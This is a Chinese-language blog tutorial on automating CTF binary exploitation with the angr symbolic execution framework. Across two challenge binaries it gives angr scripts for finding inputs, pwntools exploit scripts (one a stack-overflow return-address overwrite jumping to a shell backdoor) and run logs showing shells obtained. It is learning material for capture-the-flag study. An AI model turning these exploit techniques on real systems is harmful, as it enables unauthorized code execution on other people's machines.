AUTO PWN

First Post:

2021-03-31

Last Update:

2024-10-07

Word Count:

2.3k

Read Time:

11 min

AUTO PWN

ref: https://angr.io/

ref: https://bbs.pediy.com/thread-266757.htm

介绍

目前，CTF的PWN题越来越难以PWN掉，漏洞的挖掘和利用正逐步由人工向自动化。本文主要介绍自动化挖掘的一些实例，来学习自动化挖掘。

然而，目前angr框架是个很不错的选择，angr是二进制分析的一个开源python框架。它采用符号执行技术，其可以通过分析程序来得到让特定代码区域执行的输入。使用符号执行分析一个程序时，该程序会使用符号值作为输入，而非一般执行程序时使用的具体值。在达到目标代码时，分析器可以得到相应的路径约束，然后通过约束求解器来得到可以触发目标代码的具体值。

开源地址: https://github.com/angr/angr

涉及题目附件找i0gan要。

安装angr

为了方便不与pwntools库引起冲突，我们采用拉取docker镜像的方式进行使用，当然也可以直接 pip install angr也可以。

1	`docker pull angr/angr`

在开始之前，我使用angr docker来运行scirpt，我编写了一个bash脚本来运行我们的angr脚本，如下所示，方便例1和例2使用。

#! /bin/sh
# Author: i0gan
# for starting docker angr
pwd=`pwd`
if [[ $1 < 2 ]];then
    echo "Usage angr script.py"
    exit
fi
script=$1
docker run -it -u angr --rm -v $pwd:/mnt -w /mnt angr/angr "/home/angr/.virtualenvs/angr/bin/python" "/mnt/$script" $2 $3

Usage:

1	`./angr script.py`

Example 1

来自2021红明谷杯总决赛

checksec:

Checksec file: pwn1
[*] '/run/media/i0gan/disk1/share/project/auto_pwn/pwn1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

运行情况

~/share/project/auto_pwn  ./pwn1                                                                                                 
asdf
input your passwd:
asdfasdf
asdf
input your passwd:

程序逻辑如下

int sub_804870E()
{
  int result; // eax
  char v1[16]; // [esp+Ch] [ebp-1Ch] BYREF
  int v2; // [esp+1Ch] [ebp-Ch]

  result = inputn();
  v2 = result;
  switch ( result )
  {
    case 1:
      puts("logging out...");
      result = ~dword_804A06C;
      dword_804A06C = ~dword_804A06C;
      break;
    case 2:
      if ( dword_804A06C )
        result = shell(); // shell函数
      else
        result = puts("please log in");
      break;
    case 0:
      puts("input your passwd:");
      result = sub_804859B((int)v1, 16); // 输入密码
      dword_804A06C = 1; // 正确之后，设置dword_804A06C为1，才可以获得shell
      break;
  }
  return result;
}

上面，我们不知道密码是什么，我们也不管它是什么，我们只要能拿到shell就可以，那么如何让程序流跳到shell函数呢？angr可以方便的来实现。

下面就是shell函数的地址，只要能使程序流执行到0x08048783，我们就可以拿到shell。

.text:0804877A loc_804877A:                            ; CODE XREF: sub_804870E+19↑j
.text:0804877A                 mov     eax, ds:dword_804A06C
.text:0804877F                 test    eax, eax
.text:08048781                 jz      short loc_804878A
.text:08048783                 call    shell
.text:08048788                 jmp     short loc_804879A

好了，我们只要使程序流跑到我们的目标地址，再把输入数据给dump出来，dump出来的数据也就是我们的payload数据了。

angr脚本pwn1_angr.py 如下

import angr
from binascii import b2a_hex
import logging
import sys
#logging.getLogger('angr').setLevel('INFO')
logging.getLogger('angr').setLevel('CRITICAL')

def angr_main():
    pj = angr.Project('./pwn1')
    state = pj.factory.entry_state()
    simgr = pj.factory.simgr(state)
    simgr.explore(find = 0x08048783) # call shell
    p = simgr.found[0].posix.dumps(0)
    print(b2a_hex(p).decode(), end='')
angr_main()

运行:

1 2	`./angr pwn1_angr.py 310a320a`

这里我采用16进制方式打印出数据的，payload就是’\x31\x0a\x32\x0a’

测试:

./pwn1
1
logging out...
2
sh-5.1$ whoami
i0gan

好了，现在我们得到了拿到shell的payload，那么我们怎么实现自动化去挖掘和pwn掉它呢？

我们只需要让他先本地自动挖掘之后，让他自动打远程，如下。

pwn1_exp.py

from pwn import *
import os
from binascii import a2b_hex

io = process('./pwn1')
print('Solving...')
p = os.popen('./angr pwn1_angr.py').read()
print('Found payload: [' + p + ']')
p = a2b_hex(p)
io.send(p)
print('Get shell')
io.sendline('whoami')
io.interactive()

运行pwn1_exp.py脚本

python pwn1_exp.py
[+] Starting local process './pwn1': pid 18152
Solving...
Found payload: [310a320a]
Get shell
[*] Switching to interactive mode
logging out...
i0gan

通过以上实验，我们也可以自己来改进，我们是通过手动分析shell的函数在哪里，当然我们也可以让他自动找这个函数。

这个例子比较简单的，但感觉比手动分析的没什么两样，下面我们来个有用的。

Example 2

来自第六届全国网络空间安全技术大赛

ida打开之后，对main函数进行F5，发现IDA报下面错误

1
2
3

Decompilation failure:
8048764: too big function
Please refer to the manual to find appropriate actions

采用汇编查看图报下面错误

1
2
3

The graph is too big (more than 1000 nodes) to be displayed on the screen.
Switching to text mode.
(you can change this limit in the graph options dialog)

这是由于程序函数中的代码分支块太多，IDA没法生成图和伪代码来利于我们分析。

我截一部分有用代码如下:


.text:080487C6
.text:080487C6 loc_80487C6:                            ; CODE XREF: main+51↑j
.text:080487C6                 cmp     [ebp+var_C], 13h
.text:080487CA                 jle     short loc_80487B7
.text:080487CC                 lea     eax, [ebp+s2]
.text:080487CF                 mov     dword ptr [eax], 4A494355h
.text:080487D5                 mov     dword ptr [eax+4], 49525545h
.text:080487DC                 sub     esp, 0Ch
.text:080487DF                 push    offset aEnterThePasswo_0 ; "Enter the password: "
.text:080487E4                 call    _puts
.text:080487E9                 add     esp, 10h
.text:080487EC                 sub     esp, 8
.text:080487EF                 lea     eax, [ebp+s1]
.text:080487F2                 push    eax
.text:080487F3                 push    offset a8s      ; "%8s"
.text:080487F8                 call    _scanf // 输入8个字符的数据
.text:080487FD                 add     esp, 10h
.text:08048800                 mov     [ebp+var_10], 0
.text:08048807                 jmp     short loc_8048836

输入8个字符之后，就跳到了函数代码分支块中不断的跳来跳去的。

.text:08048836 loc_8048836:                            ; CODE XREF: main+A3↑j
.text:08048836                 cmp     [ebp+var_10], 7
.text:0804883A                 jle     short loc_8048809
.text:0804883C                 lea     eax, [ebp+s1]
.text:0804883F                 add     eax, 1
.text:08048842                 movzx   eax, byte ptr [eax]
.text:08048845                 movzx   eax, al
.text:08048848                 and     eax, 10h
.text:0804884B                 test    eax, eax
.text:0804884D                 setnz   dl
.text:08048850                 lea     eax, [ebp+s2]
.text:08048853                 add     eax, 1
.text:08048856                 movzx   eax, byte ptr [eax]
.text:08048859                 movzx   eax, al
.text:0804885C                 and     eax, 10h
.text:0804885F                 test    eax, eax
.text:08048861                 setnz   al
.text:08048864                 xor     eax, edx
.text:08048866                 test    al, al
.text:08048868                 jz      loc_808E7DC
.text:0804886E                 call    aaz
.text:08048873                 lea     eax, [ebp+s1]
....

然而发现有个函数有堆栈溢出

int login_again()
{
  char s1[72]; // [esp+0h] [ebp-48h] BYREF

  setbuf(stdout, 0);
  setbuf(stderr, 0);
  setbuf(stdin, 0);
  puts("Enter the password again: ");
  scanf("%s", s1);
  if ( !strcmp(s1, "deadbeef") )
    puts("I think you can't get shell");
  else
    puts("Error.");
  return 0;
}

且有后门函数

int get_sh()
{
  return system("/bin/sh");
}

若我们输入某些数据，能够使程序流执行到该函数，那么我们就可以利用该漏洞来获得shell，当然我们也可以直接使程序流跳到get_sh函数，但分支块中是没有用到get_sh函数的，而login_again在 ass函数中进行调用的。

int __cdecl aas(const char *s1, const char *s2)
{
  int result; // eax

  if ( should_succeed && !strncmp(s1, s2, 8u) )
    result = login_again();                     // vul
  else
    result = puts("Error.");
  return result;
}

ass函数也是在代码分支块中进行调用，所以这类似于fuzz，fuzz有关系的路径比没关系的要容易得多，我们就使程序流到达login_again之后，再利用堆栈溢出漏洞调用后门函数即可。

与例1差不多，只需要让angr引擎找到一个输入的数据满足程序流到达login_again函数即可。

编写angr脚本如下:

auto_angr.py

import angr
from binascii import b2a_hex
import logging
import sys
logging.getLogger('angr').setLevel('INFO')
#logging.getLogger('angr').setLevel('CRITICAL')

def angr_main():
    pj = angr.Project('./auto')
    state = pj.factory.entry_state()
    simgr = pj.factory.simgr(state)
    simgr.explore(find = 0x0804867E) # call login_again
    p = simgr.found[0].posix.dumps(0)
    print(b2a_hex(p).decode(), end='')
angr_main()

这里还是借助之前我们写的一个angr脚本。

运行如下:

1 2	`./angr auto_angr.py 555859554b564e5a`

那么我们得到的payload就是’\x55\x58\x59\x55\x4b\x56\x4e\x5a’，这个输入能够使我们的程序流执行到login_again函数，之后呢我们就采用简单的堆栈溢出达到获得shell了。

#!/usr/bin/env python
#-*- coding:utf-8 -*-
#Author: i0gan
from pwn import *
context.log_level = 'debug'
#io = remote('81.70.195.166', 10001)
io = process('./auto')
payload = '\x55\x58\x59\x55\x4b\x56\x4e\x5a'
io.send(payload)

payload = b'\x00' * 0x48 +  p32(0x0) + p32(0x08048665) # 修改返回地址到get_sh函数
io.sendline(payload)
io.interactive()

运行如下

[+] Starting local process './auto' argv=[b'./auto'] : pid 6957
[DEBUG] Sent 0x8 bytes:
    b'UXYUKVNZ'
[DEBUG] Sent 0x51 bytes:
    00000000  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  │····│····│····│····│
    *
    00000040  00 00 00 00  00 00 00 00  00 00 00 00  65 86 04 08  │····│····│····│e···│
    00000050  0a                                                  │·│
    00000051
[*] Switching to interactive mode
[DEBUG] Received 0x37 bytes:
    b'Enter the password: \n'
    b'Enter the password again: \n'
    b'Error.\n'
Enter the password: 
Enter the password again: 
Error.
$ whoami
[DEBUG] Sent 0x7 bytes:
    b'whoami\n'
[DEBUG] Received 0x6 bytes:
    b'i0gan\n'
i0gan

总结

通过以上两个例子，我们没有去分析输入之后程序是怎么处理该数据的，我们只关心结果，面对例子2，手动分析和调试起来极其困难，程序太大了，人工分析起来很困难，这时候，借助AUTO PWN的手段，很方便我们能够找的payload，我这个惨杂了手工分析的一些参数，这只是方便于理解，当然也可以开发出自己的一套自动化系统，自动去识别程序逻辑，完成自动构建payload，这也是今后需要不断提升和研究的。目前很多pwn也需要该手段，比如xctf中start ctf babypac可以采用angr引擎很方便的找到触发漏洞的payload，那个是个aarch架构的pwn，angr引擎是跨架构的，不影响angr来实现符号执行分析，还有vm pwn这些，若懒得分析程序逻辑，只想快速找到每个opcode对应什么分支块，采用该技术也是Perfect!。

打赏点小钱

支付宝 | Alipay

微信 | WeChat

≡